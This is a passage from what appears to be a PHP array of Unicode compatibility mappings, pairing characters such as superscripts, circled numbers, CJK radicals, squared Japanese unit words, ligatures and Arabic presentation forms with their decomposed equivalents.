'῎' => ' ̓́', '῏' => ' ̓͂', '῝' => ' ̔̀', '῞' => ' ̔́', '῟' => ' ̔͂', '῭' => ' ̈̀', '΅' => ' ̈́', '´' => ' ́', '῾' => ' ̔', ' ' => ' ', ' ' => ' ', ' ' => ' ', ' ' => ' ', ' ' => ' ', ' ' => ' ', ' ' => ' ', ' ' => ' ', ' ' => ' ', ' ' => ' ', ' ' => ' ', '‑' => '‐', '‗' => ' ̳', '․' => '.', '‥' => '..', '…' => '...', ' ' => ' ', '″' => '′′', '‴' => '′′′', '‶' => '‵‵', '‷' => '‵‵‵', '‼' => '!!', '‾' => ' ̅', '⁇' => '??', '⁈' => '?!', '⁉' => '!?', '⁗' => '′′′′', ' ' => ' ', '⁰' => '0', 'ⁱ' => 'i', '⁴' => '4', '⁵' => '5', '⁶' => '6', '⁷' => '7', '⁸' => '8', '⁹' => '9', '⁺' => '+', '⁻' => '−', '⁼' => '=', '⁽' => '(', '⁾' => ')', 'ⁿ' => 'n', '₀' => '0', '₁' => '1', '₂' => '2', '₃' => '3', '₄' => '4', '₅' => '5', '₆' => '6', '₇' => '7', '₈' => '8', '₉' => '9', '₊' => '+', '₋' => '−', '₌' => '=', '₍' => '(', '₎' => ')', 'ₐ' => 'a', 'ₑ' => 'e', 'ₒ' => 'o', 'ₓ' => 'x', 'ₔ' => 'ə', 'ₕ' => 'h', 'ₖ' => 'k', 'ₗ' => 'l', 'ₘ' => 'm', 'ₙ' => 'n', 'ₚ' => 'p', 'ₛ' => 's', 'ₜ' => 't', '₨' => 'Rs', '℀' => 'a/c', '℁' => 'a/s', 'ℂ' => 'C', '℃' => '°C', '℅' => 'c/o', '℆' => 'c/u', 'ℇ' => 'Ɛ', '℉' => '°F', 'ℊ' => 'g', 'ℋ' => 'H', 'ℌ' => 'H', 'ℍ' => 'H', 'ℎ' => 'h', 'ℏ' => 'ħ', 'ℐ' => 'I', 'ℑ' => 'I', 'ℒ' => 'L', 'ℓ' => 'l', 'ℕ' => 'N', '№' => 'No', 'ℙ' => 'P', 'ℚ' => 'Q', 'ℛ' => 'R', 'ℜ' => 'R', 'ℝ' => 'R', '℠' => 'SM', '℡' => 'TEL', '™' => 'TM', 'ℤ' => 'Z', 'ℨ' => 'Z', 'ℬ' => 'B', 'ℭ' => 'C', 'ℯ' => 'e', 'ℰ' => 'E', 'ℱ' => 'F', 'ℳ' => 'M', 'ℴ' => 'o', 'ℵ' => 'א', 'ℶ' => 'ב', 'ℷ' => 'ג', 'ℸ' => 'ד', 'ℹ' => 'i', '℻' => 'FAX', 'ℼ' => 'π', 'ℽ' => 'γ', 'ℾ' => 'Γ', 'ℿ' => 'Π', '⅀' => '∑', 'ⅅ' => 'D', 'ⅆ' => 'd', 'ⅇ' => 'e', 'ⅈ' => 'i', 'ⅉ' => 'j', '⅐' => '1⁄7', '⅑' => '1⁄9', '⅒' => '1⁄10', '⅓' => '1⁄3', '⅔' => '2⁄3', '⅕' => '1⁄5', '⅖' => '2⁄5', '⅗' => '3⁄5', '⅘' => '4⁄5', '⅙' => '1⁄6', '⅚' => '5⁄6', '⅛' => '1⁄8', '⅜' => '3⁄8', '⅝' => '5⁄8', '⅞' => '7⁄8', '⅟' => '1⁄', 'Ⅰ' => 'I', 'Ⅱ' => 'II', 'Ⅲ' => 'III', 'Ⅳ' => 'IV', 'Ⅴ' => 'V', 'Ⅵ' => 'VI', 'Ⅶ' => 'VII', 'Ⅷ' => 'VIII', 'Ⅸ' => 'IX', 'Ⅹ' => 'X', 'Ⅺ' => 'XI', 'Ⅻ' => 'XII', 'Ⅼ' => 'L', 'Ⅽ' => 'C', 'Ⅾ' => 'D', 'Ⅿ' => 'M', 'ⅰ' => 'i', 'ⅱ' => 'ii', 'ⅲ' => 'iii', 'ⅳ' => 'iv', 'ⅴ' => 'v', 'ⅵ' => 'vi', 'ⅶ' => 'vii', 'ⅷ' => 'viii', 'ⅸ' => 'ix', 'ⅹ' => 'x', 'ⅺ' => 'xi', 'ⅻ' => 'xii', 'ⅼ' => 'l', 'ⅽ' => 'c', 'ⅾ' => 'd', 'ⅿ' => 'm', '↉' => '0⁄3', '∬' => '∫∫', '∭' => '∫∫∫', '∯' => '∮∮', '∰' => '∮∮∮', '①' => '1', '②' => '2', '③' => '3', '④' => '4', '⑤' => '5', '⑥' => '6', '⑦' => '7', '⑧' => '8', '⑨' => '9', '⑩' => '10', '⑪' => '11', '⑫' => '12', '⑬' => '13', '⑭' => '14', '⑮' => '15', '⑯' => '16', '⑰' => '17', '⑱' => '18', '⑲' => '19', '⑳' => '20', '⑴' => '(1)', '⑵' => '(2)', '⑶' => '(3)', '⑷' => '(4)', '⑸' => '(5)', '⑹' => '(6)', '⑺' => '(7)', '⑻' => '(8)', '⑼' => '(9)', '⑽' => '(10)', '⑾' => '(11)', '⑿' => '(12)', '⒀' => '(13)', '⒁' => '(14)', '⒂' => '(15)', '⒃' => '(16)', '⒄' => '(17)', '⒅' => '(18)', '⒆' => '(19)', '⒇' => '(20)', '⒈' => '1.', '⒉' => '2.', '⒊' => '3.', '⒋' => '4.', '⒌' => '5.', '⒍' => '6.', '⒎' => '7.', '⒏' => '8.', '⒐' => '9.', '⒑' => '10.', '⒒' => '11.', '⒓' => '12.', '⒔' => '13.', '⒕' => '14.', '⒖' => '15.', '⒗' => '16.', '⒘' => '17.', '⒙' => '18.', '⒚' => '19.', '⒛' => '20.', '⒜' => '(a)', '⒝' => '(b)', '⒞' => '(c)', '⒟' => '(d)', '⒠' => '(e)', '⒡' => '(f)', '⒢' => '(g)', '⒣' => '(h)', '⒤' => '(i)', '⒥' => '(j)', '⒦' => '(k)', '⒧' => '(l)', '⒨' => '(m)', '⒩' => '(n)', '⒪' => '(o)', '⒫' => '(p)', '⒬' => '(q)', '⒭' => '(r)', '⒮' => '(s)', '⒯' => '(t)', '⒰' => '(u)', '⒱' => '(v)', '⒲' => '(w)', '⒳' => '(x)', '⒴' => '(y)', '⒵' => '(z)', 'Ⓐ' => 'A', 'Ⓑ' => 'B', 'Ⓒ' => 'C', 'Ⓓ' => 'D', 'Ⓔ' => 'E', 'Ⓕ' => 'F', 'Ⓖ' => 'G', 'Ⓗ' => 'H', 'Ⓘ' => 'I', 'Ⓙ' => 'J', 'Ⓚ' => 'K', 'Ⓛ' => 'L', 'Ⓜ' => 'M', 'Ⓝ' => 'N', 'Ⓞ' => 'O', 'Ⓟ' => 'P', 'Ⓠ' => 'Q', 'Ⓡ' => 'R', 'Ⓢ' => 'S', 'Ⓣ' => 'T', 'Ⓤ' => 'U', 'Ⓥ' => 'V', 'Ⓦ' => 'W', 'Ⓧ' => 'X', 'Ⓨ' => 'Y', 'Ⓩ' => 'Z', 'ⓐ' => 'a', 'ⓑ' => 'b', 'ⓒ' => 'c', 'ⓓ' => 'd', 'ⓔ' => 'e', 'ⓕ' => 'f', 'ⓖ' => 'g', 'ⓗ' => 'h', 'ⓘ' => 'i', 'ⓙ' => 'j', 'ⓚ' => 'k', 'ⓛ' => 'l', 'ⓜ' => 'm', 'ⓝ' => 'n', 'ⓞ' => 'o', 'ⓟ' => 'p', 'ⓠ' => 'q', 'ⓡ' => 'r', 'ⓢ' => 's', 'ⓣ' => 't', 'ⓤ' => 'u', 'ⓥ' => 'v', 'ⓦ' => 'w', 'ⓧ' => 'x', 'ⓨ' => 'y', 'ⓩ' => 'z', '⓪' => '0', '⨌' => '∫∫∫∫', '⩴' => '::=', '⩵' => '==', '⩶' => '===', 'ⱼ' => 'j', 'ⱽ' => 'V', 'ⵯ' => 'ⵡ', '⺟' => '母', '⻳' => '龟', '⼀' => '一', '⼁' => '丨', '⼂' => '丶', '⼃' => '丿', '⼄' => '乙', '⼅' => '亅', '⼆' => '二', '⼇' => '亠', '⼈' => '人', '⼉' => '儿', '⼊' => '入', '⼋' => '八', '⼌' => '冂', '⼍' => '冖', '⼎' => '冫', '⼏' => '几', '⼐' => '凵', '⼑' => '刀', '⼒' => '力', '⼓' => '勹', '⼔' => '匕', '⼕' => '匚', '⼖' => '匸', '⼗' => '十', '⼘' => '卜', '⼙' => '卩', '⼚' => '厂', '⼛' => '厶', '⼜' => '又', '⼝' => '口', '⼞' => '囗', '⼟' => '土', '⼠' => '士', '⼡' => '夂', '⼢' => '夊', '⼣' => '夕', '⼤' => '大', '⼥' => '女', '⼦' => '子', '⼧' => '宀', '⼨' => '寸', '⼩' => '小', '⼪' => '尢', '⼫' => '尸', '⼬' => '屮', '⼭' => '山', '⼮' => '巛', '⼯' => '工', '⼰' => '己', '⼱' => '巾', '⼲' => '干', '⼳' => '幺', '⼴' => '广', '⼵' => '廴', '⼶' => '廾', '⼷' => '弋', '⼸' => '弓', '⼹' => '彐', '⼺' => '彡', '⼻' => '彳', '⼼' => '心', '⼽' => '戈', '⼾' => '戶', '⼿' => '手', '⽀' => '支', '⽁' => '攴', '⽂' => '文', '⽃' => '斗', '⽄' => '斤', '⽅' => '方', '⽆' => '无', '⽇' => '日', '⽈' => '曰', '⽉' => '月', '⽊' => '木', '⽋' => '欠', '⽌' => '止', '⽍' => '歹', '⽎' => '殳', '⽏' => '毋', '⽐' => '比', '⽑' => '毛', '⽒' => '氏', '⽓' => '气', '⽔' => '水', '⽕' => '火', '⽖' => '爪', '⽗' => '父', '⽘' => '爻', '⽙' => '爿', '⽚' => '片', '⽛' => '牙', '⽜' => '牛', '⽝' => '犬', '⽞' => '玄', '⽟' => '玉', '⽠' => '瓜', '⽡' => '瓦', '⽢' => '甘', '⽣' => '生', '⽤' => '用', '⽥' => '田', '⽦' => '疋', '⽧' => '疒', '⽨' => '癶', '⽩' => '白', '⽪' => '皮', '⽫' => '皿', '⽬' => '目', '⽭' => '矛', '⽮' => '矢', '⽯' => '石', '⽰' => '示', '⽱' => '禸', '⽲' => '禾', '⽳' => '穴', '⽴' => '立', '⽵' => '竹', '⽶' => '米', '⽷' => '糸', '⽸' => '缶', '⽹' => '网', '⽺' => '羊', '⽻' => '羽', '⽼' => '老', '⽽' => '而', '⽾' => '耒', '⽿' => '耳', '⾀' => '聿', '⾁' => '肉', '⾂' => '臣', '⾃' => '自', '⾄' => '至', '⾅' => '臼', '⾆' => '舌', '⾇' => '舛', '⾈' => '舟', '⾉' => '艮', '⾊' => '色', '⾋' => '艸', '⾌' => '虍', '⾍' => '虫', '⾎' => '血', '⾏' => '行', '⾐' => '衣', '⾑' => '襾', '⾒' => '見', '⾓' => '角', '⾔' => '言', '⾕' => '谷', '⾖' => '豆', '⾗' => '豕', '⾘' => '豸', '⾙' => '貝', '⾚' => '赤', '⾛' => '走', '⾜' => '足', '⾝' => '身', '⾞' => '車', '⾟' => '辛', '⾠' => '辰', '⾡' => '辵', '⾢' => '邑', '⾣' => '酉', '⾤' => '釆', '⾥' => '里', '⾦' => '金', '⾧' => '長', '⾨' => '門', '⾩' => '阜', '⾪' => '隶', '⾫' => '隹', '⾬' => '雨', '⾭' => '靑', '⾮' => '非', '⾯' => '面', '⾰' => '革', '⾱' => '韋', '⾲' => '韭', '⾳' => '音', '⾴' => '頁', '⾵' => '風', '⾶' => '飛', '⾷' => '食', '⾸' => '首', '⾹' => '香', '⾺' => '馬', '⾻' => '骨', '⾼' => '高', '⾽' => '髟', '⾾' => '鬥', '⾿' => '鬯', '⿀' => '鬲', '⿁' => '鬼', '⿂' => '魚', '⿃' => '鳥', '⿄' => '鹵', '⿅' => '鹿', '⿆' => '麥', '⿇' => '麻', '⿈' => '黃', '⿉' => '黍', '⿊' => '黑', '⿋' => '黹', '⿌' => '黽', '⿍' => '鼎', '⿎' => '鼓', '⿏' => '鼠', '⿐' => '鼻', '⿑' => '齊', '⿒' => '齒', '⿓' => '龍', '⿔' => '龜', '⿕' => '龠', ' ' => ' ', '〶' => '〒', '〸' => '十', '〹' => '卄', '〺' => '卅', '゛' => ' ゙', '゜' => ' ゚', 'ゟ' => 'より', 'ヿ' => 'コト', 'ㄱ' => 'ᄀ', 'ㄲ' => 'ᄁ', 'ㄳ' => 'ᆪ', 'ㄴ' => 'ᄂ', 'ㄵ' => 'ᆬ', 'ㄶ' => 'ᆭ', 'ㄷ' => 'ᄃ', 'ㄸ' => 'ᄄ', 'ㄹ' => 'ᄅ', 'ㄺ' => 'ᆰ', 'ㄻ' => 'ᆱ', 'ㄼ' => 'ᆲ', 'ㄽ' => 'ᆳ', 'ㄾ' => 'ᆴ', 'ㄿ' => 'ᆵ', 'ㅀ' => 'ᄚ', 'ㅁ' => 'ᄆ', 'ㅂ' => 'ᄇ', 'ㅃ' => 'ᄈ', 'ㅄ' => 'ᄡ', 'ㅅ' => 'ᄉ', 'ㅆ' => 'ᄊ', 'ㅇ' => 'ᄋ', 'ㅈ' => 'ᄌ', 'ㅉ' => 'ᄍ', 'ㅊ' => 'ᄎ', 'ㅋ' => 'ᄏ', 'ㅌ' => 'ᄐ', 'ㅍ' => 'ᄑ', 'ㅎ' => 'ᄒ', 'ㅏ' => 'ᅡ', 'ㅐ' => 'ᅢ', 'ㅑ' => 'ᅣ', 'ㅒ' => 'ᅤ', 'ㅓ' => 'ᅥ', 'ㅔ' => 'ᅦ', 'ㅕ' => 'ᅧ', 'ㅖ' => 'ᅨ', 'ㅗ' => 'ᅩ', 'ㅘ' => 'ᅪ', 'ㅙ' => 'ᅫ', 'ㅚ' => 'ᅬ', 'ㅛ' => 'ᅭ', 'ㅜ' => 'ᅮ', 'ㅝ' => 'ᅯ', 'ㅞ' => 'ᅰ', 'ㅟ' => 'ᅱ', 'ㅠ' => 'ᅲ', 'ㅡ' => 'ᅳ', 'ㅢ' => 'ᅴ', 'ㅣ' => 'ᅵ', 'ㅤ' => 'ᅠ', 'ㅥ' => 'ᄔ', 'ㅦ' => 'ᄕ', 'ㅧ' => 'ᇇ', 'ㅨ' => 'ᇈ', 'ㅩ' => 'ᇌ', 'ㅪ' => 'ᇎ', 'ㅫ' => 'ᇓ', 'ㅬ' => 'ᇗ', 'ㅭ' => 'ᇙ', 'ㅮ' => 'ᄜ', 'ㅯ' => 'ᇝ', 'ㅰ' => 'ᇟ', 'ㅱ' => 'ᄝ', 'ㅲ' => 'ᄞ', 'ㅳ' => 'ᄠ', 'ㅴ' => 'ᄢ', 'ㅵ' => 'ᄣ', 'ㅶ' => 'ᄧ', 'ㅷ' => 'ᄩ', 'ㅸ' => 'ᄫ', 'ㅹ' => 'ᄬ', 'ㅺ' => 'ᄭ', 'ㅻ' => 'ᄮ', 'ㅼ' => 'ᄯ', 'ㅽ' => 'ᄲ', 'ㅾ' => 'ᄶ', 'ㅿ' => 'ᅀ', 'ㆀ' => 'ᅇ', 'ㆁ' => 'ᅌ', 'ㆂ' => 'ᇱ', 'ㆃ' => 'ᇲ', 'ㆄ' => 'ᅗ', 'ㆅ' => 'ᅘ', 'ㆆ' => 'ᅙ', 'ㆇ' => 'ᆄ', 'ㆈ' => 'ᆅ', 'ㆉ' => 'ᆈ', 'ㆊ' => 'ᆑ', 'ㆋ' => 'ᆒ', 'ㆌ' => 'ᆔ', 'ㆍ' => 'ᆞ', 'ㆎ' => 'ᆡ', '㆒' => '一', '㆓' => '二', '㆔' => '三', '㆕' => '四', '㆖' => '上', '㆗' => '中', '㆘' => '下', '㆙' => '甲', '㆚' => '乙', '㆛' => '丙', '㆜' => '丁', '㆝' => '天', '㆞' => '地', '㆟' => '人', '㈀' => '(ᄀ)', '㈁' => '(ᄂ)', '㈂' => '(ᄃ)', '㈃' => '(ᄅ)', '㈄' => '(ᄆ)', '㈅' => '(ᄇ)', '㈆' => '(ᄉ)', '㈇' => '(ᄋ)', '㈈' => '(ᄌ)', '㈉' => '(ᄎ)', '㈊' => '(ᄏ)', '㈋' => '(ᄐ)', '㈌' => '(ᄑ)', '㈍' => '(ᄒ)', '㈎' => '(가)', '㈏' => '(나)', '㈐' => '(다)', '㈑' => '(라)', '㈒' => '(마)', '㈓' => '(바)', '㈔' => '(사)', '㈕' => '(아)', '㈖' => '(자)', '㈗' => '(차)', '㈘' => '(카)', '㈙' => '(타)', '㈚' => '(파)', '㈛' => '(하)', '㈜' => '(주)', '㈝' => '(오전)', '㈞' => '(오후)', '㈠' => '(一)', '㈡' => '(二)', '㈢' => '(三)', '㈣' => '(四)', '㈤' => '(五)', '㈥' => '(六)', '㈦' => '(七)', '㈧' => '(八)', '㈨' => '(九)', '㈩' => '(十)', '㈪' => '(月)', '㈫' => '(火)', '㈬' => '(水)', '㈭' => '(木)', '㈮' => '(金)', '㈯' => '(土)', '㈰' => '(日)', '㈱' => '(株)', '㈲' => '(有)', '㈳' => '(社)', '㈴' => '(名)', '㈵' => '(特)', '㈶' => '(財)', '㈷' => '(祝)', '㈸' => '(労)', '㈹' => '(代)', '㈺' => '(呼)', '㈻' => '(学)', '㈼' => '(監)', '㈽' => '(企)', '㈾' => '(資)', '㈿' => '(協)', '㉀' => '(祭)', '㉁' => '(休)', '㉂' => '(自)', '㉃' => '(至)', '㉄' => '問', '㉅' => '幼', '㉆' => '文', '㉇' => '箏', '㉐' => 'PTE', '㉑' => '21', '㉒' => '22', '㉓' => '23', '㉔' => '24', '㉕' => '25', '㉖' => '26', '㉗' => '27', '㉘' => '28', '㉙' => '29', '㉚' => '30', '㉛' => '31', '㉜' => '32', '㉝' => '33', '㉞' => '34', '㉟' => '35', '㉠' => 'ᄀ', '㉡' => 'ᄂ', '㉢' => 'ᄃ', '㉣' => 'ᄅ', '㉤' => 'ᄆ', '㉥' => 'ᄇ', '㉦' => 'ᄉ', '㉧' => 'ᄋ', '㉨' => 'ᄌ', '㉩' => 'ᄎ', '㉪' => 'ᄏ', '㉫' => 'ᄐ', '㉬' => 'ᄑ', '㉭' => 'ᄒ', '㉮' => '가', '㉯' => '나', '㉰' => '다', '㉱' => '라', '㉲' => '마', '㉳' => '바', '㉴' => '사', '㉵' => '아', '㉶' => '자', '㉷' => '차', '㉸' => '카', '㉹' => '타', '㉺' => '파', '㉻' => '하', '㉼' => '참고', '㉽' => '주의', '㉾' => '우', '㊀' => '一', '㊁' => '二', '㊂' => '三', '㊃' => '四', '㊄' => '五', '㊅' => '六', '㊆' => '七', '㊇' => '八', '㊈' => '九', '㊉' => '十', '㊊' => '月', '㊋' => '火', '㊌' => '水', '㊍' => '木', '㊎' => '金', '㊏' => '土', '㊐' => '日', '㊑' => '株', '㊒' => '有', '㊓' => '社', '㊔' => '名', '㊕' => '特', '㊖' => '財', '㊗' => '祝', '㊘' => '労', '㊙' => '秘', '㊚' => '男', '㊛' => '女', '㊜' => '適', '㊝' => '優', '㊞' => '印', '㊟' => '注', '㊠' => '項', '㊡' => '休', '㊢' => '写', '㊣' => '正', '㊤' => '上', '㊥' => '中', '㊦' => '下', '㊧' => '左', '㊨' => '右', '㊩' => '医', '㊪' => '宗', '㊫' => '学', '㊬' => '監', '㊭' => '企', '㊮' => '資', '㊯' => '協', '㊰' => '夜', '㊱' => '36', '㊲' => '37', '㊳' => '38', '㊴' => '39', '㊵' => '40', '㊶' => '41', '㊷' => '42', '㊸' => '43', '㊹' => '44', '㊺' => '45', '㊻' => '46', '㊼' => '47', '㊽' => '48', '㊾' => '49', '㊿' => '50', '㋀' => '1月', '㋁' => '2月', '㋂' => '3月', '㋃' => '4月', '㋄' => '5月', '㋅' => '6月', '㋆' => '7月', '㋇' => '8月', '㋈' => '9月', '㋉' => '10月', '㋊' => '11月', '㋋' => '12月', '㋌' => 'Hg', '㋍' => 'erg', '㋎' => 'eV', '㋏' => 'LTD', '㋐' => 'ア', '㋑' => 'イ', '㋒' => 'ウ', '㋓' => 'エ', '㋔' => 'オ', '㋕' => 'カ', '㋖' => 'キ', '㋗' => 'ク', '㋘' => 'ケ', '㋙' => 'コ', '㋚' => 'サ', '㋛' => 'シ', '㋜' => 'ス', '㋝' => 'セ', '㋞' => 'ソ', '㋟' => 'タ', '㋠' => 'チ', '㋡' => 'ツ', '㋢' => 'テ', '㋣' => 'ト', '㋤' => 'ナ', '㋥' => 'ニ', '㋦' => 'ヌ', '㋧' => 'ネ', '㋨' => 'ノ', '㋩' => 'ハ', '㋪' => 'ヒ', '㋫' => 'フ', '㋬' => 'ヘ', '㋭' => 'ホ', '㋮' => 'マ', '㋯' => 'ミ', '㋰' => 'ム', '㋱' => 'メ', '㋲' => 'モ', '㋳' => 'ヤ', '㋴' => 'ユ', '㋵' => 'ヨ', '㋶' => 'ラ', '㋷' => 'リ', '㋸' => 'ル', '㋹' => 'レ', '㋺' => 'ロ', '㋻' => 'ワ', '㋼' => 'ヰ', '㋽' => 'ヱ', '㋾' => 'ヲ', '㋿' => '令和', '㌀' => 'アパート', '㌁' => 'アルファ', '㌂' => 'アンペア', '㌃' => 'アール', '㌄' => 'イニング', '㌅' => 'インチ', '㌆' => 'ウォン', '㌇' => 'エスクード', '㌈' => 'エーカー', '㌉' => 'オンス', '㌊' => 'オーム', '㌋' => 'カイリ', '㌌' => 'カラット', '㌍' => 'カロリー', '㌎' => 'ガロン', '㌏' => 'ガンマ', '㌐' => 'ギガ', '㌑' => 'ギニー', '㌒' => 'キュリー', '㌓' => 'ギルダー', '㌔' => 'キロ', '㌕' => 'キログラム', '㌖' => 'キロメートル', '㌗' => 'キロワット', '㌘' => 'グラム', '㌙' => 'グラムトン', '㌚' => 'クルゼイロ', '㌛' => 'クローネ', '㌜' => 'ケース', '㌝' => 'コルナ', '㌞' => 'コーポ', '㌟' => 'サイクル', '㌠' => 'サンチーム', '㌡' => 'シリング', '㌢' => 'センチ', '㌣' => 'セント', '㌤' => 'ダース', '㌥' => 'デシ', '㌦' => 'ドル', '㌧' => 'トン', '㌨' => 'ナノ', '㌩' => 'ノット', '㌪' => 'ハイツ', '㌫' => 'パーセント', '㌬' => 'パーツ', '㌭' => 'バーレル', '㌮' => 'ピアストル', '㌯' => 'ピクル', '㌰' => 'ピコ', '㌱' => 'ビル', '㌲' => 'ファラッド', '㌳' => 'フィート', '㌴' => 'ブッシェル', '㌵' => 'フラン', '㌶' => 'ヘクタール', '㌷' => 'ペソ', '㌸' => 'ペニヒ', '㌹' => 'ヘルツ', '㌺' => 'ペンス', '㌻' => 'ページ', '㌼' => 'ベータ', '㌽' => 'ポイント', '㌾' => 'ボルト', '㌿' => 'ホン', '㍀' => 'ポンド', '㍁' => 'ホール', '㍂' => 'ホーン', '㍃' => 'マイクロ', '㍄' => 'マイル', '㍅' => 'マッハ', '㍆' => 'マルク', '㍇' => 'マンション', '㍈' => 'ミクロン', '㍉' => 'ミリ', '㍊' => 'ミリバール', '㍋' => 'メガ', '㍌' => 'メガトン', '㍍' => 'メートル', '㍎' => 'ヤード', '㍏' => 'ヤール', '㍐' => 'ユアン', '㍑' => 'リットル', '㍒' => 'リラ', '㍓' => 'ルピー', '㍔' => 'ルーブル', '㍕' => 'レム', '㍖' => 'レントゲン', '㍗' => 'ワット', '㍘' => '0点', '㍙' => '1点', '㍚' => '2点', '㍛' => '3点', '㍜' => '4点', '㍝' => '5点', '㍞' => '6点', '㍟' => '7点', '㍠' => '8点', '㍡' => '9点', '㍢' => '10点', '㍣' => '11点', '㍤' => '12点', '㍥' => '13点', '㍦' => '14点', '㍧' => '15点', '㍨' => '16点', '㍩' => '17点', '㍪' => '18点', '㍫' => '19点', '㍬' => '20点', '㍭' => '21点', '㍮' => '22点', '㍯' => '23点', '㍰' => '24点', '㍱' => 'hPa', '㍲' => 'da', '㍳' => 'AU', '㍴' => 'bar', '㍵' => 'oV', '㍶' => 'pc', '㍷' => 'dm', '㍸' => 'dm2', '㍹' => 'dm3', '㍺' => 'IU', '㍻' => '平成', '㍼' => '昭和', '㍽' => '大正', '㍾' => '明治', '㍿' => '株式会社', '㎀' => 'pA', '㎁' => 'nA', '㎂' => 'μA', '㎃' => 'mA', '㎄' => 'kA', '㎅' => 'KB', '㎆' => 'MB', '㎇' => 'GB', '㎈' => 'cal', '㎉' => 'kcal', '㎊' => 'pF', '㎋' => 'nF', '㎌' => 'μF', '㎍' => 'μg', '㎎' => 'mg', '㎏' => 'kg', '㎐' => 'Hz', '㎑' => 'kHz', '㎒' => 'MHz', '㎓' => 'GHz', '㎔' => 'THz', '㎕' => 'μl', '㎖' => 'ml', '㎗' => 'dl', '㎘' => 'kl', '㎙' => 'fm', '㎚' => 'nm', '㎛' => 'μm', '㎜' => 'mm', '㎝' => 'cm', '㎞' => 'km', '㎟' => 'mm2', '㎠' => 'cm2', '㎡' => 'm2', '㎢' => 'km2', '㎣' => 'mm3', '㎤' => 'cm3', '㎥' => 'm3', '㎦' => 'km3', '㎧' => 'm∕s', '㎨' => 'm∕s2', '㎩' => 'Pa', '㎪' => 'kPa', '㎫' => 'MPa', '㎬' => 'GPa', '㎭' => 'rad', '㎮' => 'rad∕s', '㎯' => 'rad∕s2', '㎰' => 'ps', '㎱' => 'ns', '㎲' => 'μs', '㎳' => 'ms', '㎴' => 'pV', '㎵' => 'nV', '㎶' => 'μV', '㎷' => 'mV', '㎸' => 'kV', '㎹' => 'MV', '㎺' => 'pW', '㎻' => 'nW', '㎼' => 'μW', '㎽' => 'mW', '㎾' => 'kW', '㎿' => 'MW', '㏀' => 'kΩ', '㏁' => 'MΩ', '㏂' => 'a.m.', '㏃' => 'Bq', '㏄' => 'cc', '㏅' => 'cd', '㏆' => 'C∕kg', '㏇' => 'Co.', '㏈' => 'dB', '㏉' => 'Gy', '㏊' => 'ha', '㏋' => 'HP', '㏌' => 'in', '㏍' => 'KK', '㏎' => 'KM', '㏏' => 'kt', '㏐' => 'lm', '㏑' => 'ln', '㏒' => 'log', '㏓' => 'lx', '㏔' => 'mb', '㏕' => 'mil', '㏖' => 'mol', '㏗' => 'PH', '㏘' => 'p.m.', '㏙' => 'PPM', '㏚' => 'PR', '㏛' => 'sr', '㏜' => 'Sv', '㏝' => 'Wb', '㏞' => 'V∕m', '㏟' => 'A∕m', '㏠' => '1日', '㏡' => '2日', '㏢' => '3日', '㏣' => '4日', '㏤' => '5日', '㏥' => '6日', '㏦' => '7日', '㏧' => '8日', '㏨' => '9日', '㏩' => '10日', '㏪' => '11日', '㏫' => '12日', '㏬' => '13日', '㏭' => '14日', '㏮' => '15日', '㏯' => '16日', '㏰' => '17日', '㏱' => '18日', '㏲' => '19日', '㏳' => '20日', '㏴' => '21日', '㏵' => '22日', '㏶' => '23日', '㏷' => '24日', '㏸' => '25日', '㏹' => '26日', '㏺' => '27日', '㏻' => '28日', '㏼' => '29日', '㏽' => '30日', '㏾' => '31日', '㏿' => 'gal', 'ꚜ' => 'ъ', 'ꚝ' => 'ь', 'ꝰ' => 'ꝯ', 'ꟸ' => 'Ħ', 'ꟹ' => 'œ', 'ꭜ' => 'ꜧ', 'ꭝ' => 'ꬷ', 'ꭞ' => 'ɫ', 'ꭟ' => 'ꭒ', 'ꭩ' => 'ʍ', 'ff' => 'ff', 'fi' => 'fi', 'fl' => 'fl', 'ffi' => 'ffi', 'ffl' => 'ffl', 'ſt' => 'st', 'st' => 'st', 'ﬓ' => 'մն', 'ﬔ' => 'մե', 'ﬕ' => 'մի', 'ﬖ' => 'վն', 'ﬗ' => 'մխ', 'ﬠ' => 'ע', 'ﬡ' => 'א', 'ﬢ' => 'ד', 'ﬣ' => 'ה', 'ﬤ' => 'כ', 'ﬥ' => 'ל', 'ﬦ' => 'ם', 'ﬧ' => 'ר', 'ﬨ' => 'ת', '﬩' => '+', 'ﭏ' => 'אל', 'ﭐ' => 'ٱ', 'ﭑ' => 'ٱ', 'ﭒ' => 'ٻ', 'ﭓ' => 'ٻ', 'ﭔ' => 'ٻ', 'ﭕ' => 'ٻ', 'ﭖ' => 'پ', 'ﭗ' => 'پ', 'ﭘ' => 'پ', 'ﭙ' => 'پ', 'ﭚ' => 'ڀ', 'ﭛ' => 'ڀ', 'ﭜ' => 'ڀ', 'ﭝ' => 'ڀ', 'ﭞ' => 'ٺ', 'ﭟ' => 'ٺ', 'ﭠ' => 'ٺ', 'ﭡ' => 'ٺ', 'ﭢ' => 'ٿ', 'ﭣ' => 'ٿ', 'ﭤ' => 'ٿ', 'ﭥ' => 'ٿ', 'ﭦ' => 'ٹ', 'ﭧ' => 'ٹ', 'ﭨ' => 'ٹ', 'ﭩ' => 'ٹ', 'ﭪ' => 'ڤ', 'ﭫ' => 'ڤ', 'ﭬ' => 'ڤ', 'ﭭ' => 'ڤ', 'ﭮ' => 'ڦ', 'ﭯ' => 'ڦ', 'ﭰ' => 'ڦ', 'ﭱ' => 'ڦ', 'ﭲ' => 'ڄ', 'ﭳ' => 'ڄ', 'ﭴ' => 'ڄ', 'ﭵ' => 'ڄ', 'ﭶ' => 'ڃ', 'ﭷ' => 'ڃ', 'ﭸ' => 'ڃ', 'ﭹ' => 'ڃ', 'ﭺ' => 'چ', 'ﭻ' => 'چ', 'ﭼ' => 'چ', 'ﭽ' => 'چ', 'ﭾ' => 'ڇ', 'ﭿ' => 'ڇ', 'ﮀ' => 'ڇ', 'ﮁ' => 'ڇ', 'ﮂ' => 'ڍ', 'ﮃ' => 'ڍ', 'ﮄ' => 'ڌ', 'ﮅ' => 'ڌ', 'ﮆ' => 'ڎ', 'ﮇ' => 'ڎ', 'ﮈ' => 'ڈ', 'ﮉ' => 'ڈ', 'ﮊ' => 'ژ', 'ﮋ' => 'ژ', 'ﮌ' => 'ڑ', 'ﮍ' => 'ڑ', 'ﮎ' => 'ک', 'ﮏ' => 'ک', 'ﮐ' => 'ک', 'ﮑ' => 'ک', 'ﮒ' => 'گ', 'ﮓ' => 'گ', 'ﮔ' => 'گ', 'ﮕ' => 'گ', 'ﮖ' => 'ڳ', 'ﮗ' => 'ڳ', 'ﮘ' => 'ڳ', 'ﮙ' => 'ڳ', 'ﮚ' => 'ڱ', 'ﮛ' => 'ڱ', 'ﮜ' => 'ڱ', 